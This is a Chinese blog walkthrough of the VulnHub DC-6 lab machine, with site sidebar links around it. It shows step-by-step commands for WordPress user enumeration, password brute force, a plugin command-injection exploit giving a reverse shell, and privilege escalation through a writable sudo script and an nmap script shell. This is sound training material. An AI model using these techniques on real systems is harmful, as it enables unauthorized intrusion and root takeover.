靶场练习第十四天~vulnhub靶场之dc-6

最新推荐文章于 2024-03-21 11:45:54 发布
最新推荐文章于 2024-03-21 11:45:54 发布
阅读量510 收藏 1
点赞数
分类专栏: # 靶机练习 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122882445
版权

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接: 百度网盘 请输入提取码 提取码: bazx

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

命令:sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -sV -p- 192.168.101.119

(2)看看详细信息

nmap -A -p- 192.168.101.119

2.网站的信息收集

(1)访问靶机的网站

1.先从80端口寻找突破口,访问一下http://192.168.101.119 ,发现URL栏写的不是靶机的ip,而是http://wordy/,而很明显,DNS没有解析出来

2.回过头来注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件

(2)配置hosts文件

1.sudo vim /etc/hosts ;在文件添加:192.168.101.115(靶机ip) wordy

2.再次访问http://192.168.101.115

没有发现啥有用信息,只是知道这个是一个WordPress网站

(3)用wpscan工具看看这个靶机网站有什么用户

wpscan --url http://wordy --enumerate u

发现了几个用户

(4)用dirb扫描看看网站的后台登录是哪个网址

dirb http://wordy

1.打开http://wordy/wp-admin/ ,发现登录网址

(5)wpscan字典爆破

1.在桌面创建一个wordy-pass1.dic文件

2.将rockyou.txt里面的密码复制到wordy-pass1.dic

cd /usr/share/wordlists/

ls

cp rockyou.txt /home/kali/桌面/wordy-pass1.dic

3.将刚才得到的用户放在文件user.txt

vim user.txt

cat user.txt

3.使用wpscan进行密码爆破

常规的方法跑太费时间,把一部分密码拿出来跑

cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic

wpscan --ignore-main-redirect --url http://wordy -U user.txt -P wordy-pass1.dic --force

得出Username: mark, Password: helpdesk01

用爆破出来的用户密码登录

成功登录到网站后台

(6)使用mark用户登录后台,发现一个插件Activity monitor,猜测这个插件存在漏洞

1.searchsploitg工具查看Activity monitor漏洞

searchsploit Activity monitor

发现是命令注入漏洞

(1)修改html代码action跳转及shell反弹IP地址到kali本机

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

cp 45274.html 45274.html.bak

vim 45274.html

(2)Kali临时开启HTTP服务,并访问45274.html页面

python -m SimpleHTTPServer 80

同时在kali终端这边开启监听9999端口,在页面点击submit request后,反弹shell成功

(3)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

三、提权

1. 进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现graham用户及登录密码

cd /home/mark/stuff

ls

cat things-to-do.txt

2.用得到的用户密码ssh远程登录

ssh graham@192.168.101.119

3. graham用户成功登录后,查看当前用户可以执行的操作

sudo -l

发现可以运行jens用户下面的backups.sh

4.查看backups.sh

cd /home/jens

ls

cat backups.sh

5. 在backups.sh文件中写入/bin/bash,并以jens用户去执行该脚本

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

6.获得jens用户权限时,查看jens用户可执行的操作

sudo -l

发现jens用户可以在无密码状态下使用nmap命令

7. 发现flag

写入一条命令到getShell,并通过nmap运行getShell成功进入root用户,在/root目录下找到theflag.txt文件

echo 'os.execute("/bin/sh")' > getShell

sudo  nmap  --script=getShell

cd /root

cat theflag.txt

汉南帝
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python暴力破解受密码保护的zip/rar文件
学以致用 知行合一
05-25 936
Python暴力破解受密码保护的zip/rar文件的代码参考,虽说是暴力破解,但是几率不大,除非密码相对简单,否则时间成本根本花不起,密码本里面包含的也有限,只是思路,可以一试。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub dc1
m0_58564181的博客
07-06 1008
vulnhub dc1的渗透过程
vulnhub靶机:dc-6
waitagirl的博客
03-21 381
vulnhub靶机:dc-6
渗透测试靶机vulnhub——DC6实战笔记
qq_56426046的博客
04-05 648
wpscan爆破用户密码****插件远程命令执行的漏洞nmap脚本执行提权若是你所期望的,那定会得到强烈的回应。
渗透测试学习之靶机DC-6
xdbzdgx的博客
11-28 5169
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-6的下载地址为DC: 6 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-6只有一个flag。 在VMware加载成功之后并开启,建议把DC-6靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
靶机渗透练习04-driftingblues4
Force~
03-27 2197
1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192.168.111.0/24 2、端口扫描 nmap -sS -A -sV -T4 -p- 192.168
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
【vulnhub】---DC-6靶机
qq_43168364的博客
08-21 643
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
靶机7 DC-6(过程超详细)
honest_gg的博客
09-26 2605
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
Vulnhub靶机渗透测试——DC-6
Cobra的博客
05-18 352
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.186 二、信息收集 1、使用nmap探测存活主机 nmap -sP 192.168.189.0/24 2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描 nmap -sV -A -T4 -p- 192.168.189.186 3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件 4、修改完成后即可正常访问
vulnhub靶场DC-6
qq_58091216的博客
01-11 1003
只有一个flag。
Vulnhub靶机之DC-6
m0_60911102的博客
11-30 909
Vulnhub靶机之DC-6
DC-6靶场
qq_49518993的博客
08-31 1192
DC-6靶场
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 743
DC-6靶机详细渗透过程
vulnhub靶场 planets
08-28
- *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值